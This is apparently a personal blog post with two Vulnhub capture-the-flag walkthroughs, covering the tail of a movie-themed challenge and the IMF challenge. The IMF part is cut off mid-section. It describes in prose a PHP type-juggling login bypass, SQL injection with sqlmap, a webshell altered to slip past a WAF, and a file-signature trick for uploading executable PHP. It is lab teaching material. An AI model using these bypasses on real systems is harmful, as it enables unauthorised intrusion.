<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgoDbahHmepTcFCLttVLICpMmzyLlLb5GMxsGJLMfZZDO-MzTlB1Kdg00ynas0BM1Ii8qVSpWDWunzJBqKWnrfQWJ7t0-bBcllbfio_xolYwtGqMo0ykwNYN8q3rQ4USeXXJlFT50yjg3Ap/s1600/flag1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgoDbahHmepTcFCLttVLICpMmzyLlLb5GMxsGJLMfZZDO-MzTlB1Kdg00ynas0BM1Ii8qVSpWDWunzJBqKWnrfQWJ7t0-bBcllbfio_xolYwtGqMo0ykwNYN8q3rQ4USeXXJlFT50yjg3Ap/s320/flag1.png" width="320" /></a></div>
<br />
At this point, I have no other leads to go on for the next flag, so I decide to start investigating the suspicious port I found on my nmap scan. So I connect with ssh and boom! The next flag.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixMo-doNE9EapPJhzLehSvfmBrJ1XrRCCAG-PZ2lsHiSS5q1N3i5bs01Km0nn0z9g9X1ta1bw9sFgTDqZGAHrzPT9VVp0inp-LhTQL0T3F-91qMPuWv4n21UUqQLEdAoFf-2Zqa8YXzYYN/s1600/flag2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixMo-doNE9EapPJhzLehSvfmBrJ1XrRCCAG-PZ2lsHiSS5q1N3i5bs01Km0nn0z9g9X1ta1bw9sFgTDqZGAHrzPT9VVp0inp-LhTQL0T3F-91qMPuWv4n21UUqQLEdAoFf-2Zqa8YXzYYN/s320/flag2.png" width="320" /></a></div>
<br />
So let's see if we can't crack these two md5 hashes, because otherwise I'm not sure what else to do at the moment. The first hash is the hash of the word 'nmap', how convenient, and the second hash is the word 'encrypt'. So I try it as the password and it fails. I then try it as the password for user 'frank' and it fails again. What the hell does 'encrypt' mean? I decided to re-assess every piece of information I had. Port 22 is closed according to nmap. Port 80 is open and has a webserver. Port 443....is SSL...encrypted! I start immediately going through the webserver. The code is exactly the same, so what should I be looking for? What makes SSL encrypted? Well, the encryption depends on the private key, and the private key isn't going to be available, so the public key must be available, and the public key is stored in a certificate! So I pulled up the certificate and holy crap, of course, there is the third flag.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEicxastY_Ek5x6DHuNAC57y-6kkXOCoThLQ7N_KmYDysRf9JkiDN8HFIaCzhFIaJhbsshBYDTsfEuVEH6TSg5CeFyKCgYqQ1MqEE_2u6TUXKDG8ljUm304BBQdkzS0rPRIjUhZTiu0fJHvb/s1600/flag3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEicxastY_Ek5x6DHuNAC57y-6kkXOCoThLQ7N_KmYDysRf9JkiDN8HFIaCzhFIaJhbsshBYDTsfEuVEH6TSg5CeFyKCgYqQ1MqEE_2u6TUXKDG8ljUm304BBQdkzS0rPRIjUhZTiu0fJHvb/s320/flag3.png" width="320" /></a></div>
<br />
After cracking the third flag it says personnel..HEY! We already found that page! So I pull up the personnel page again and reinvestigate it. Nothing in the source code. No cookies are being stored. It must have to do with my IP address, but I'm not sure what is considered an 'FBI' workstation. Man, how many times do I have to feel like I don't have enough information!<br />
<br />
At this point I start clicking through every page I know about searching for 'FBI', and something comes up in the html5.js for temporary support for IE4 Workstations. It's odd that it's specifically IE4; could it be filtering on the User-Agent string? Let's try. So I found an IE4 user-agent string and added a browser extension to change my user-agent, and up came a very different page...<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjA9uzFQ6uQfW0c666-Gr2WO-rNfVt3HKHIQy9AtuZGuWelKGlcXHB7cy7v6kio4hf0uQ_1o17b6wrBB9Gc56peqRff9pnqq0hzlLc6RB9lo0t-cJedEcw5md-Zh1Dzg2JezXd3d6ghmTkz/s1600/fbi_portal.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjA9uzFQ6uQfW0c666-Gr2WO-rNfVt3HKHIQy9AtuZGuWelKGlcXHB7cy7v6kio4hf0uQ_1o17b6wrBB9Gc56peqRff9pnqq0hzlLc6RB9lo0t-cJedEcw5md-Zh1Dzg2JezXd3d6ghmTkz/s320/fbi_portal.png" width="320" /></a></div>
<br />
And if you look near the bottom, we get a flag! There is also a clue, "Clue = new+flag". We crack the flag and it's 'evidence'. Ok, I need evidence of whatever 'new evidence' is. So, looking through the webpage, there are certain numbers that are made bold: 'six, one, 7, 4, 6, 8'. Could this be new evidence? A directory doesn't exist with those numbers, so let's try using the clue newevidence. Sure enough, I get an authentication-required prompt. So I try hanratty:617468. Fail. I spell out the first two numbers. Fail. So, thinking back to doug.perterson from the html5.js, I don't know "Agent Hanratty's" first name, so I google 'hanratty'. At first I see some James Hanratty stuff, but as I scroll down I see 'hanratty catch me if you can'. Seriously? This is some obscure movie reference?? (I personally hate obscure movie references in CTFs because I have seen almost NO popular movies, my fault, still annoying). Things are making more sense now: I've seen the name Frank Abagnale and FBI, and I learn that Agent Hanratty's name is Carl. So the username is probably carl.hanratty. I try this with the numbers, still to no avail. Come ooonnnnn.<br />
<br />
Now that I know this CTF is based on the movie and the flag name mentions dialogue, I decided to try and make a password list from the script. So I used cewl (which I have a post about on here as well: http://professionalhackerdigest.blogspot.com/2016/09/a-pretty-cewl-post.html) to generate a list and decided to use that list with Burp Suite to attempt to brute force the login. This will take a good long while because of the degradation in service that Burp Suite provides as a feature of the free version.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-_zxa89aXToHmFADIUg40QziqlwvX88gCiKOIJMFgekVLFRrsJxFM0FSvWXqXPotbg_qFjl9jbtlYgTXKK0yKg95m6_8C0rbpw4vXR4JzQsbEIPfIlPh0lJHs8rg4RqlHIadAvJyg-SeN/s1600/burp_suite_brute_force.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-_zxa89aXToHmFADIUg40QziqlwvX88gCiKOIJMFgekVLFRrsJxFM0FSvWXqXPotbg_qFjl9jbtlYgTXKK0yKg95m6_8C0rbpw4vXR4JzQsbEIPfIlPh0lJHs8rg4RqlHIadAvJyg-SeN/s320/burp_suite_brute_force.png" width="320" /></a></div>
<br />
I had to test the original list and I added all lowercase, all uppercase, and first letter capitalized to finally find the password, "Grace".<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjRhjL1mWWLKEetBZUW4xlQHVvJw1x-iLj7R1DPjHxPtiVO4CBhKna1DShmwvyFIRghWZhjuaV2kueZqqCnwp8wrCa7TrZEZtxc-BLH4RQv0SSif9fzBHrwB8NIyRuoMJ759EFoGXkmTkxf/s1600/newevidence.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjRhjL1mWWLKEetBZUW4xlQHVvJw1x-iLj7R1DPjHxPtiVO4CBhKna1DShmwvyFIRghWZhjuaV2kueZqqCnwp8wrCa7TrZEZtxc-BLH4RQv0SSif9fzBHrwB8NIyRuoMJ759EFoGXkmTkxf/s320/newevidence.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjhkPfEbIWC6LRAzS-JLGb_4GmMbUvsa-D6efvvHu4OovyXtdfHtYqu2KakgxBpFQHTgcMk6PXsGbhRNLUsdHgol77MXFwtobuPcv5-unDaCfHsaSCxwaUuPmeRx0vtzQs_FxEr98ocJCuA/s1600/flag5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjhkPfEbIWC6LRAzS-JLGb_4GmMbUvsa-D6efvvHu4OovyXtdfHtYqu2KakgxBpFQHTgcMk6PXsGbhRNLUsdHgol77MXFwtobuPcv5-unDaCfHsaSCxwaUuPmeRx0vtzQs_FxEr98ocJCuA/s320/flag5.png" width="320" /></a></div>
The fifth flag is "panam". There are two more links on this page. One shows an image and the other shows a pdf. The image is a picture of a river and a beach with some people, some houses and a small castle in the background. I downloaded it and ran exiftool against it, but nothing interesting came up. The pdf is an invoice from Hetzl and Associates for "Encryption Consultation Project" done for Agent Earl Amdursky of the FBI and some guy named Stefan Hetzl actually did the work. So after searching for "Stefan Hetzl encryption" on google, the tool StegHide comes up. *Lightbulb* the picture we downloaded has an embedded message with StegHide.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEieNb3ziXTizixeAn9KGKIQ0V9WcvSEkNjyupofnCptcjM4dG82LK8-GZgopJplEb6H24SUugRipDx7NKme81I6-kd7hcBsfd1LI13gl7ErE-jA1qG_hESeWv5vp3oqGcTmo3Ms3ywLtkY1/s1600/flag6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEieNb3ziXTizixeAn9KGKIQ0V9WcvSEkNjyupofnCptcjM4dG82LK8-GZgopJplEb6H24SUugRipDx7NKme81I6-kd7hcBsfd1LI13gl7ErE-jA1qG_hESeWv5vp3oqGcTmo3Ms3ywLtkY1/s320/flag6.png" width="320" /></a></div>
<br />
As you can see in the picture, I had to download steghide (apt-get install steghide) and then followed the man page to successfully extract the message from the image. The passphrase was the previous flag "panam", which makes sense in the context of this CTF. Interestingly enough, the flag is decrypted for us here and it says "ILoveFrance". This looks like a password to me, so I'm going to keep that in mind going forward. There is also a clue, "iheartbrenda", all lowercase. Possibly a directory? Nope, not a directory. Neither is "ILoveFrance".<br />
<br />
Ok, so, we now have what looks like a password or maybe two (because we know they're not directories), and the flag title references 'the fastest man alive'. Luckily, I know that's a reference to The Flash (comic book character knowledge ftw), and I decided to go through the script looking for 'fastest man alive'. Nothing. So I googled 'fastest man alive the flash' and then it hit me: Barry Allen, his pseudonym. So I checked the script for 'barry allen'. Again nothing! So, back to Google AGAIN. I searched 'barry allen catch me if you can' and there were numerous references to the movie, and Carl is convinced that Frank is named Barry Allen. Could this be a username, and could we have a password for the SSH connection we've been waiting for???<br />
<br />
I tried a few combinations of Barry Allen (barry, barry.allen, barryallen) (of course the last one worked) and the password was 'iheartbrenda' instead of the 'ILoveFrance'. Works for me!<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEha-uI-QbJRaEGN1uczUZfrfKc9w3nxQGNp4JX1ONq-Xbu7X6aTWIlAlSXeTizlw2RvXbXTYELKVy4k0fHnJPOHbij6gQc50UlYgtsGBVAHPUVR82lpI7Tcho3C2vDv1gjzgLPtDdv4pNjG/s1600/ssh_login.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEha-uI-QbJRaEGN1uczUZfrfKc9w3nxQGNp4JX1ONq-Xbu7X6aTWIlAlSXeTizlw2RvXbXTYELKVy4k0fHnJPOHbij6gQc50UlYgtsGBVAHPUVR82lpI7Tcho3C2vDv1gjzgLPtDdv4pNjG/s320/ssh_login.png" width="320" /></a></div>
<br />
The 7th flag is in the home directory as flag.txt and the md5 is 'theflash'.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPlhSdJnOFHnOFUZy2fpJXg-hTkS4aO-qIXuPEyFIul4p5oaTIKxYyN2p5WKHdGRQfqUCRCnx6yrqS6Hd61wXa9nfL15pxqKC9HrlA9YwuivPdYWTEdcL3ZECAzVwcbUpOmcKd3iPfaVMu/s1600/flag7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPlhSdJnOFHnOFUZy2fpJXg-hTkS4aO-qIXuPEyFIul4p5oaTIKxYyN2p5WKHdGRQfqUCRCnx6yrqS6Hd61wXa9nfL15pxqKC9HrlA9YwuivPdYWTEdcL3ZECAzVwcbUpOmcKd3iPfaVMu/s320/flag7.png" width="320" /></a></div>
So, there is also a security-system.data file in the home directory. After running file on security-system.data we can see it's a zip archive, so I scp it to my Kali box to analyze it further. I am able to unzip and expand it, but now running file on it just says it's data. Next, I run strings on it and there seem to be a lot of Windows API calls. As I scroll through the output of strings I see well known output from the Windows cmd.exe prompt, and I realize the file is 1 GB in size and has a lot of Windows functionality; this is probably a Windows image!<br />
<br />
I'm not great with volatility, but I decide to try my luck and use it to open up this potential Windows image. First I run the imageinfo plugin and confirm that it is indeed a Windows image. Then I run screenshot and I just barely see something in one of the pictures: it has 'code.txt' open in notepad and a cmd.exe prompt behind it.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiGi1i3xNFco2lHGRzse-lWVqhTx_ZZDGiWSNQYrt39ScGGBItHXRZqrgvpxcKU-0fCsjQarfnAU7BdLMbO4o_4Fzj6qil76cGtUuQgkzVwKKdELoc8FROdiCsHJ842GsU4528S7TEJ8xrk/s1600/vol_screenshot_code_txt.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiGi1i3xNFco2lHGRzse-lWVqhTx_ZZDGiWSNQYrt39ScGGBItHXRZqrgvpxcKU-0fCsjQarfnAU7BdLMbO4o_4Fzj6qil76cGtUuQgkzVwKKdELoc8FROdiCsHJ842GsU4528S7TEJ8xrk/s320/vol_screenshot_code_txt.png" width="320" /></a></div>
<br />
So I immediately start looking for this code.txt and processes with cmd.exe. I found the processes, but I found something better quickly after! There is a notepad plugin for volatility that displays the text from a notepad.exe that is currently running. It's a series of hex values, as you can see below:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOcQz0zQ-eq73st1igR3ymYr6d_L_ke20mrEfsdWIJYgP5vreFy1HlwiCPmCUrcEtnHUN0qQEw-pSHrTsw09Np9TNU0sMamlN3u0wpNtuIbSmh_ni44VfUL9Mu9JeDgMcSp5-jukqbnijk/s1600/vol_notepad.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOcQz0zQ-eq73st1igR3ymYr6d_L_ke20mrEfsdWIJYgP5vreFy1HlwiCPmCUrcEtnHUN0qQEw-pSHrTsw09Np9TNU0sMamlN3u0wpNtuIbSmh_ni44VfUL9Mu9JeDgMcSp5-jukqbnijk/s320/vol_notepad.png" width="320" /></a></div>
<br />
xxd wasn't giving me all of the answer, but I knew the answer HAD to be in there, so I tried a different hex converter and sure enough, it prints out the last flag.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCT8LmrhOxGVLaOu9rYbSThMeaakKBrmcJ_lPwHBgHd6M3ixAGbC_rVV54JGIUbRx8i2k48ShMVl5FI1CrmyCdEguQT3fGkH7QOe1a3ogQPnZ-LBq2SqmsnvFBDTxrAQKoj6V0f2jaETW1/s1600/hex2ascii_flag8.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCT8LmrhOxGVLaOu9rYbSThMeaakKBrmcJ_lPwHBgHd6M3ixAGbC_rVV54JGIUbRx8i2k48ShMVl5FI1CrmyCdEguQT3fGkH7QOe1a3ogQPnZ-LBq2SqmsnvFBDTxrAQKoj6V0f2jaETW1/s320/hex2ascii_flag8.png" width="320" /></a></div>
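As an added example (my own code, not from the post or the CTF), here is the kind of small decoder I would reach for when a hex dump such as the notepad output above does not come out cleanly through xxd. It ignores whitespace, colons and 0x prefixes, drops a dangling nibble from a truncated dump, detects UTF-16LE (Notepad keeps its edit buffer in UTF-16, which leaves a NUL after every ASCII character and is one reason a straight xxd -r -p can look wrong), and strips non-printable bytes. The sample dump is constructed for this example; it is not the real flag.<br />

```python
import re
import string

# Added example, not code from the original post. Constructed sample dump:
# the text 'flag8{example}' as Notepad would hold it (UTF-16LE), wrapped the
# way a plugin might print it. The real flag is not reproduced here.
SAMPLE_DUMP = """
66 00 6c 00 61 00 67 00 38 00 7b 00 65 00 78 00
61 00 6d 00 70 00 6c 00 65 00 7d 00
"""

PRINTABLE = set(string.printable) - {"\x0b", "\x0c"}


def hex_to_bytes(dump: str) -> bytes:
    """Strip 0x prefixes and every non-hex character (spaces, newlines, colons),
    then decode. A dangling odd nibble from a truncated dump is dropped, not fatal."""
    digits = re.sub(r"0[xX]", "", dump)
    digits = re.sub(r"[^0-9a-fA-F]", "", digits)
    if len(digits) % 2:
        digits = digits[:-1]
    return bytes.fromhex(digits)


def looks_utf16le(raw: bytes) -> bool:
    """ASCII text stored as UTF-16LE has a NUL in every odd position."""
    return len(raw) >= 4 and len(raw) % 2 == 0 and all(b == 0 for b in raw[1::2])


def hex_to_text(dump: str) -> str:
    """Decode a hex dump to text, choosing UTF-16LE or single-byte decoding,
    and discard the non-printable bytes a naive converter would leave in."""
    raw = hex_to_bytes(dump)
    if looks_utf16le(raw):
        text = raw.decode("utf-16-le", errors="replace")
    else:
        text = raw.decode("latin-1")
    return "".join(ch for ch in text if ch in PRINTABLE)


if __name__ == "__main__":
    print(hex_to_text(SAMPLE_DUMP))
```

Run it as a script to see the decoded sample, or call hex_to_text() on whatever the plugin printed.<br />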
<br />
I would like to thank the author James Bower for creating this awesome CTF and anyone who helped him. I would also like to thank Vulnhub.com for hosting this. I hope you enjoy this walkthrough. -Hack Responsibly, Hack Professionally.<br />
<br />
Austin<br />
<br />
Vulnhub - IMF Walkthrough (posted 2016-11-17)<br />
<br />
Welcome! This is my walkthrough of the IMF challenge hosted on vulnhub.com. The URL for this exact machine is: https://www.vulnhub.com/entry/imf-1,162/<br />
<br />
And now....onto the walkthrough....<br />
<br />
After loading the image into VirtualBox, it showed up as 192.168.6.101 on my local network.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhpJpIAmdx6Kl1rpAPcPtark5V1Kxv1adW3BDsmAY_QdW3ZdMgPoS1lfX-RBNZUkiEkg65L1ImMzxXPUEsfx5AA44WdL_XWlag6WrPs-qLiGtyl4S8rQrlwkhCN_hW2_SRQDoBV6RkULhPJ/s1600/imf_webpage.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhpJpIAmdx6Kl1rpAPcPtark5V1Kxv1adW3BDsmAY_QdW3ZdMgPoS1lfX-RBNZUkiEkg65L1ImMzxXPUEsfx5AA44WdL_XWlag6WrPs-qLiGtyl4S8rQrlwkhCN_hW2_SRQDoBV6RkULhPJ/s320/imf_webpage.png" width="320" /></a></div>
First, I decided to scroll through the source code of the web pages, which is always a decent first thing to do. Sometimes it can lead to hidden folders that were simply commented out, potentially interesting folders beyond /images, /css, and /js, or, in this case, the first flag!<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjiCK3YKkYs1vbNBSny0LwwQWuNV21J1BVStjTa5Z7SHuqI0dvWVmCCpNcXLbv-I3ObpUnaaMGeTYudeXVMsJzzYOUelgAZwToR3PnO3qNaws9NrzP4Qp05ZzwxISnucwC55QGbqoob5R4V/s1600/flag1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjiCK3YKkYs1vbNBSny0LwwQWuNV21J1BVStjTa5Z7SHuqI0dvWVmCCpNcXLbv-I3ObpUnaaMGeTYudeXVMsJzzYOUelgAZwToR3PnO3qNaws9NrzP4Qp05ZzwxISnucwC55QGbqoob5R4V/s320/flag1.png" width="320" /></a></div>
The flag was base64 encoded and after decoding it using linux-fu (echo <flag> | base64 -d) it read 'allthefiles' (no quotes). Next, I tried browsing to the /allthefiles folder, but to no avail. Then I ran a DirBuster scan with a wordlist to see if there was a hidden directory I needed to find, but nothing jumped out there either. Then I noticed that some of the JavaScript files had names that were base64 encoded, so I tried to decode them and got part of flag2 in the output; concatenating the names together gives the next flag.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhJE95ikFeExNFQgWvtANv-kXa3DcCJLOAen9bc0RH7dOkyHikb_gZxy8_hfBGXV21Ek4cngFYVXbovbRCF9C2XaGhVt3RI7RztwWu39zA4eZYdkXqlUMFE5E6AdMeCaYWuF2ByWPe75okR/s1600/flag2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhJE95ikFeExNFQgWvtANv-kXa3DcCJLOAen9bc0RH7dOkyHikb_gZxy8_hfBGXV21Ek4cngFYVXbovbRCF9C2XaGhVt3RI7RztwWu39zA4eZYdkXqlUMFE5E6AdMeCaYWuF2ByWPe75okR/s320/flag2.png" width="320" /></a></div>
<br />
Now to base64 decode flag2... and we get 'imfadministrator' (no quotes). Again, I tried using the flag as a path, and this time it got us to a login prompt.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjTVTtLTxwRvAlL32dHlsnvJkqgAxHuJfSVul7pgABl405bm0JCfFgqUmMKtaylWAo9865j2VgJURDWEGW3zaZmqG2j8EcERfyx0ndiPPq4f9u0tnKuwRiIGYYm77ly_ajCCf6HkFZ2rQtt/s1600/web_login.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjTVTtLTxwRvAlL32dHlsnvJkqgAxHuJfSVul7pgABl405bm0JCfFgqUmMKtaylWAo9865j2VgJURDWEGW3zaZmqG2j8EcERfyx0ndiPPq4f9u0tnKuwRiIGYYm77ly_ajCCf6HkFZ2rQtt/s320/web_login.png" width="320" /></a></div>
After trying imf:administrator as the first pair of credentials, I saw the response 'Invalid Username', so I tried admin, administrator, and root and got the same response. Then I remembered the contacts on the contact.php page. I tried all three usernames (the first part of the email addresses) and rmichaels was the only one that returned 'Invalid Password'. Different error messages for a bad username and a bad password are a textbook username enumeration flaw, and that is exactly what confirmed rmichaels as a valid account. Next, I took a look at the source code and the first thing I saw was a huge comment "<!-- I couldn't get the SQL working, so I hard-coded the password. It's still mad secure through. - Roger -->" (no quotes). Ok, no SQLi, but onto password guessing!<br />
<br />
After password guessing for a while (longer than I care to admit) I started googling for things along the lines of 'php password bypass'. Lots of SQLi pages came up, but another page came up that said something along the lines of 'PHP password bypass for CTF'. *strokes beard*. The trick is PHP type juggling: string comparison functions such as strcmp() return NULL (with a warning) when handed an array instead of a string, and under PHP's loose comparison NULL == 0 is true, so a check of the form strcmp($submitted, $hardcoded) == 0 succeeds without knowing the password. Turning the password field in the POST request into an array (appending [] to its name) is enough to make PHP pass an array in, and the page incorrectly lets us through.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiigLSWUafcDStrsawK3cCbV2t9GTEZYDv-MGBow_8wk46GpO6_8WhWnfisKB1K4c6F5FaWEI2djV-XHJ9CHfjH2Fl8lQqP214swXmeirrsW6xFNBNn1bMA4YYc4oWBZ5p3UN7uWMZOWx_w/s1600/burp_suite_php_type_exploit.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiigLSWUafcDStrsawK3cCbV2t9GTEZYDv-MGBow_8wk46GpO6_8WhWnfisKB1K4c6F5FaWEI2djV-XHJ9CHfjH2Fl8lQqP214swXmeirrsW6xFNBNn1bMA4YYc4oWBZ5p3UN7uWMZOWx_w/s320/burp_suite_php_type_exploit.png" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJYDfgTcQC_9mpI8p2d5r01tOhfSFjYnXefFzW9duxYtosnJM46wxrtFUxphqUNYr1T1sjNv506AWsRYt5G1SLgtNPZJaJQTBfgNkSJDDd7AswVz9nMVoXJEkyopZ9GRxyiUbCQKkBzhaM/s1600/flag3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJYDfgTcQC_9mpI8p2d5r01tOhfSFjYnXefFzW9duxYtosnJM46wxrtFUxphqUNYr1T1sjNv506AWsRYt5G1SLgtNPZJaJQTBfgNkSJDDd7AswVz9nMVoXJEkyopZ9GRxyiUbCQKkBzhaM/s320/flag3.png" width="320" /></a></div>
Flag3 simply states 'continueTOcms', so I clicked on the link to continue my adventure. I found the CMS and poked around for a little bit. Nothing interesting in the source, no exploitable LFI that I could see. Then I tried SQLi on the pagename parameter. Bingo! After some initial failures, I finally realized that I wasn't including my PHPSESSID cookie in my sqlmap runs; the CMS is behind the login, so without the session cookie sqlmap never reaches the injectable page. With the cookie passed via --cookie, I finally got my command:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiaU2X31RAkgsfdzLg6r3m1JFTmy-gK2kWRZyNS2S4D9VZ_ywK1czZMN1Jc2ZjjIE-2NWBCbyvnmBdBhDa9GNBJ6pCZWOQsLHjyyleN5GMNjLiTqNdJ_yzYeWlf9L1WKT1XuF8IKFrI6c0A/s1600/sqlmap_command.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiaU2X31RAkgsfdzLg6r3m1JFTmy-gK2kWRZyNS2S4D9VZ_ywK1czZMN1Jc2ZjjIE-2NWBCbyvnmBdBhDa9GNBJ6pCZWOQsLHjyyleN5GMNjLiTqNdJ_yzYeWlf9L1WKT1XuF8IKFrI6c0A/s320/sqlmap_command.png" width="320" /></a></div>
<br />
The dump showed a page we hadn't seen before, 'tutorials-incomplete' (no quotes). This page has a picture with a QR code. After scanning it, I got the fourth flag. The flag was 'uploadr942.php', so I navigated to that page next.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiajHHDQHm3RLGkl4XX8kNaROwvx1T4QOdyx5-4R5VEtSjOKcqCYtnsy6Au7yumCl7EyP2aFzXN_Gd4PjTe3YAddCkdr8YddabjkK47vQoBaHv04mLCQg4dYQQg3kJ1o0brxcXQy_0U67m-/s1600/uploadr942.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiajHHDQHm3RLGkl4XX8kNaROwvx1T4QOdyx5-4R5VEtSjOKcqCYtnsy6Au7yumCl7EyP2aFzXN_Gd4PjTe3YAddCkdr8YddabjkK47vQoBaHv04mLCQg4dYQQg3kJ1o0brxcXQy_0U67m-/s320/uploadr942.png" width="320" /></a></div>
<br />
First I tried to upload a text file and got an invalid file type error. After trying a couple of different formats, I found that jpg was accepted as a valid file type. There isn't any information on where the picture was uploaded to, so I tried the obvious options, /images and /uploads. /images returned a blank page and /uploads was forbidden. So it exists? Going back to the upload result, there is a comment in the source code that didn't exist before; a unique hash? Possible filename? /images/<hash>.jpg was not found, but /uploads/<hash>.jpg worked! Holy crap! Ok, so now I needed something I could execute code with, so I grabbed a webshell included in Kali Linux and attempted to upload it renamed with a .php.jpg extension. Unfortunately, this didn't work because 'CrappyWAF detected malware. Signature: fopen php function detected'. Well screw you too IMF.<br />
<br />
The CrappyWAF also detected the 'system' function. ....seriously....and exec too....and shell_exec....and passthru...COME ON!<br />
<br />
I found a Stack Overflow page that listed different ways to execute code via PHP, and BACKTICKS seemed to be the way: in PHP, backticks are the shell-execution operator, equivalent to shell_exec(), but there is no function name in the source for a signature to match. I edited my PHP webshell to use backticks instead of system/exec/whatever calls and I only got 'Error: Invalid file data' instead of CrappyWAF errors. Two steps forward, one step back. Now, how to make it look like valid data...<br />
<br />
After trying for a couple of hours I decided that jpg files were not going to work, and I determined that png, bmp, and gif are also acceptable formats. I used a technique I found online: write the JPEG magic number "FF D8 FF E0" at the start of a file with a .gif extension and then append the raw PHP after it. Those leading bytes are enough to satisfy the file-data check, and everything outside the PHP tags is simply passed through as output when the file is run. This FINALLY allows us to achieve code execution on the machine.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
